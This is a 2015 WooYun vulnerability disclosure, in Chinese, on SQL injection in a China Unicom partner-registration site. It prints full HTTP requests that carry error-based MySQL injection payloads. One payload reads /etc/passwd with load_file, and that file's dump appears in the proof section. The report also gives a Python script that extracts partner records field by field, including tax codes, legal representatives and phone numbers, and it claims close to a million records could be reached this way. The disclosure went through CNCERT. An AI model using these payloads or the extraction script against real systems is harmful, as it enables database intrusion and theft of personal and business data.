当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0152672
漏洞标题:
中国联通某重要站点SQL注入(近百万合作企业及业务员信息泄漏可load_file)
相关厂商:
中国联通
漏洞作者:
超威蓝猫
提交时间:
2015-11-07 22:31
修复时间:
2015-12-26 10:40
公开时间:
2015-12-26 10:40
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
18
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-11-07: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

其实这篇报告主要讲的是工具的使用(吧, 顺便学学python x_x

详细说明:

https://**.**.**.**
随手点开条公告,id参数存在注入

POST /PAR_PO_WW/indexController.jhtml?cmd=noticeDetail HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 101
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://**.**.**.**/portal/index.jhtml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=DF4CD228E00D50823CB5A1C81E200CC6
id=61706' and 1=(select 1E308*if((select*from(select substr(load_file('/etc/passwd'),1,450))x),2,2))#


sshot-2015-11-07-[1].png

sshot-2015-11-07-[2].png


https://**.**.**.**/PAR_PO_WW/WebRegController.jhtml
第二部录入信息处,填入"组织机构代码"时会向服务端请求其可用性,此处存在注入:

sshot-2015-11-07-[3].png


由于读不到information_schema, 无法获取列名,所以我们把提交资料时发送的包里的各个参数名测试一遍,看看哪些是可用的:

sshot-2015-11-07-[4].png


正则大法好:

sshot-2015-11-07-[5].png

sshot-2015-11-07-[6].png


扔进burpsuite跑一跑:

sshot-2015-11-07-[7].png


我们把不存在的列名过滤出来,全选后删除,然后将剩下的可用列名导出

sshot-2015-11-07-[8].png

sshot-2015-11-07-[9].png


然后就可以大把大把地抓数据辣!

sshot-2015-11-07-[10].png


近百万的企业数据哦, 包括但不限于: 合作方名称、组织机构代码\统一社会信用代码、机构地址、税务登记号、所在国家省份城市、法人代表、注册资金、公司电话号码、营业执照注册号、业务员姓名、身份证号、手机号 等

POST /PAR_PO_WW/WebMptBaseInfoController.jhtml?cmd=validateOrgCode HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 93
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://**.**.**.**/PAR_PO_WW/WebRegController.jhtml?cmd=toRegInfo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=18ED1DDDDB3F6FCF80CF16D248935D55
org_code=' and 1=(select 1E308*if((select*from(select count(*) from t_mpt_base_info)x),2,2))#

sshot-2015-11-07-[11].png


贴上一段自己写的 PoC x_x (随手写写,仅作证明用

import requests
import re
import urllib
def getHeadersFromHttpRaw(raw_text):
	#return a dict containing headers from raw
	headers={}
	t=raw_text.split('\n\n',1)[0].split('\n')
	for i in range(1,len(t)):
		t2=t[i].split(": ")
		headers[t2[0]]=t2[1]
	return headers
def mysqlHextoRaw(Hexed_text):
	b=""
	i=0
	while(i<len(Hexed_text)):
		b+="%"+Hexed_text[i:i+2]
		i+=2
	return urllib.unquote(b).decode('utf8')
pattern=**.**.**.**pile(r"(?<=1E308 \* if\(\(select ')(.*?)(?=' from dual)")
raw1="""
Host: **.**.**.**
Connection: Close
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate"""
data1="""partner_name=' and 1=(select 1E308*if((select*from(select CONCAT_WS("|",IFNULL(partner_type,''),IFNULL(card_type,''),IFNULL(org_code,''),hex(IFNULL(partner_name,'')),IFNULL(partner_name_en,''),IFNULL(country,''),hex(IFNULL(province_code,'')),hex(IFNULL(city_name,'')),IFNULL(tax_type,''),IFNULL(tax_code,''),IFNULL(corp_portal,''),hex(IFNULL(partner_address,'')),IFNULL(org_type,''),IFNULL(corp_alias,''),hex(IFNULL(legal_representative,'')),IFNULL(orgcode_start_date,''),IFNULL(orgcode_end_date,''),IFNULL(enroll_fund,''),IFNULL(currency_type,''),IFNULL(phone_number,''),IFNULL(fax_number,''),IFNULL(admin_org,''),IFNULL(admin_org_code,''),IFNULL(buss_type,''),IFNULL(post_code,''),IFNULL(enroll_code,''),IFNULL(enroll_date,''),IFNULL(license_code,''),IFNULL(license_code_start,''),IFNULL(license_code_end,''),hex(IFNULL(buss_scope,'')),IFNULL(is_listed,''),IFNULL(partner_id,''),IFNULL(partner_mdm_code,''),IFNULL(parent_code,''),IFNULL(first_reg_role,''),IFNULL(first_reg_prov,'')) from t_mpt_base_info limit $._.$,1)x),2,2))#"""
for i in range(888,899):
	a=requests.post("https://**.**.**.**:443/PAR_PO_WW/WebMptBaseInfoController.jhtml?cmd=validatePartnerName",headers=getHeadersFromHttpRaw(raw1),data=data1.replace("$._.$",str(i)),verify=False,proxies={"https":"http://localhost:27000"})
	b=pattern.search(a.content).group()
	c=b.split("|")
	for i in [3,6,7,11,14,30]:
		c[i]=mysqlHextoRaw(c[i])
	b="|".join(c)
	print b


sshot-2015-11-07-[12].png

漏洞证明:

/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
dba:x:102:500::/home/dba:/bin/bash
mysql:x:601:500::/home/mysql:/bin/bash
aiuap:x:602:602::/home/aiuap:/bin/bash
aiuap_jc:x:604:100::/home/aiuap_jc:/bin/bash
test:x:605:605::/home/test:/bin/bash
unionmon:x:606:606::/home/unionmon:/bin/bash
imonitor:x:607:607::/home/imonitor:/bin/bash
deployer:x:608:608::/home/deployer:/bin/bash

修复方案:

._. 联通更专业

版权声明:转载请注明来源 超威蓝猫@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-11 10:39

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无